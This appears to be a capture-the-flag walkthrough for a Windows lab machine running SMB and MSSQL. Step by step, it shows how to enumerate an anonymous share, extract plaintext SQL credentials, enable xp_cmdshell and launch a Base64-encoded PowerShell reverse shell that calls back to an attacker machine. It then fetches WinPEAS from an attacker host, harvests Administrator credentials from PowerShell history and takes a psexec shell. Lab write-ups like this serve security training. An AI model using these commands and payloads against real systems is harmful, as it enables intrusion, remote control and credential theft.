1. Scanning & Enumeration
Initial scan (fast or full):
nmap -F XXX.XXX.XXX.XXX
# or
nmap -T4 -p- -A XXX.XXX.XXX.XXX
Open Ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1433/tcp open ms-sql-s
Observation:
- Port 135 (MSRPC) and 445 (SMB) indicate Windows file sharing and RPC services.
- Port 1433 exposes Microsoft SQL Server.
2. SMB Enumeration
Since SMB is exposed, enumerate shares anonymously:
smbclient -L \\XXX.XXX.XXX.XXX -N
Discovered Share
- backups (no authentication required)
Access the share:
smbclient \\XXX.XXX.XXX.XXX\\backups -N
Inside the share, a configuration file is found containing plaintext credentials.
3. Credential Discovery
From the backup configuration file, a full MSSQL connection string is exposed:
Data Source=.;
User ID=ARCHETYPE\sql_svc;
Password=M3g4c0rp123;
Initial Catalog=Catalog;
Provider=SQLNCLI10.1;
Persist Security Info=True;
Auto Translate=False;
Extracted credentials:
ARCHETYPE/sql_svc : M3g4c0rp123
These credentials are reused to authenticate directly to Microsoft SQL Server.
4. MSSQL Access
Two valid approaches:
Option A – Impacket
impacket-mssqlclient ARCHETYPE/sql_svc@XXX.XXX.XXX.XXX -windows-auth
Option B – Custom MSSQL script
Use a script to authenticate and enable command execution.
5. Enable xp_cmdshell
Once authenticated, enable command execution:
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
The SQL service account has sufficient privileges to execute OS commands.
6. Reverse Shell
Prepare listeners on the attacker machine:
nc -lvnp 4444
python3 -m http.server 80
Execute a Base64-encoded PowerShell reverse shell via xp_cmdshell:
xp_cmdshell "powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA3AC4AMQAyADkAIgAsADQANAA0ADQAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA"
Shell obtained as:
ARCHETYPE\\sql_svc
7. Privilege Escalation Enumeration
Host WinPEAS on the attacker machine:
python3 -m http.server 80
Download WinPEAS from the target using PowerShell:
powershell -c "wget http://<ATTACKER_IP>/winPEASany_ofs.exe -OutFile winpeas.exe"
Execute:
C:\\Users\\Public\\winpeas.exe
8. Credential Harvesting
WinPEAS reveals sensitive PowerShell history:
C:\\Users\\sql_svc\\AppData\\Roaming\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txt
File contains Administrator credentials.
9. Administrator Access
Use Impacket to gain full SYSTEM / Administrator shell:
impacket-psexec Administrator@XXX.XXX.XXX.XXX
Successful command-line access as Administrator.
10. Flags
- User flag:
C:\\Users\\sql_svc\\Desktop\\user.txt - Root flag:
C:\\Users\\Administrator\\Desktop\\root.txt
Leave a Reply